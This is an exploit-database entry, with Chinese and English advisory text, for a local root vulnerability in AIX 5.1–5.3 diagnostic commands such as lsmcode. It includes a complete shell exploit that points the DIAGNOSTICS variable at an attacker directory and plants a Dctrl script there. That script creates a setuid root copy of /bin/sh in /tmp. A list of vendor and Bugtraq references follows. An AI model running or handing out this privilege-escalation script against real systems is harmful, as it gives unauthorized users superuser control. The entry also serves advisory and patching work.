https://www.exploit-db.com/exploits/25039
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-077

AIX5.1至5.3版本的诊断命令存在不可信的执行路径漏洞，这些诊断命令包括(1)lsmcode，(2)diag_exec，(3)invscout，和(4)invscoutd。本地用户通过修改恶意Dctrl程序端口的DIAGNOSTICS环境变量执行任意文件。

source: http://www.securityfocus.com/bid/12041/info

diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment variable.

A local attacker may leverage this issue to gain superuser privileges on a computer running the affected software. 

mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

来源:XF
名称:aix-diagnostics-gain-privileges(18620)
链接:http://xforce.iss.net/xforce/xfdb/18620
来源:BID
名称:12041
链接:http://www.securityfocus.com/bid/12041
来源:AIXAPAR
名称:IY64389
链接:http://www-1.ibm.com/support/search.wss?rs=0&q;=IY64389&apar;=only
来源:AIXAPAR
名称:IY64277
链接:http://www-1.ibm.com/support/search.wss?rs=0&q;=IY64277&apar;=only
来源:BUGTRAQ
名称:20041220AIX5.1/5.2/5.3localrootexploits
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110355931920123&w;=2
来源:BUGTRAQ
名称:20070402Re:AIX4.3lsmcodelocalrootcommandexecution
链接:http://www.securityfocus.com/archive/1/archive/1/464481/100/0/threaded
来源:BUGTRAQ
名称:20070330AIX4.3lsmcodelocalrootcommandexecution
链接:http://www.securityfocus.com/archive/1/archive/1/464276/100/0/threaded
来源:MILW0RM
名称:701
链接:http://milw0rm.com/exploits/701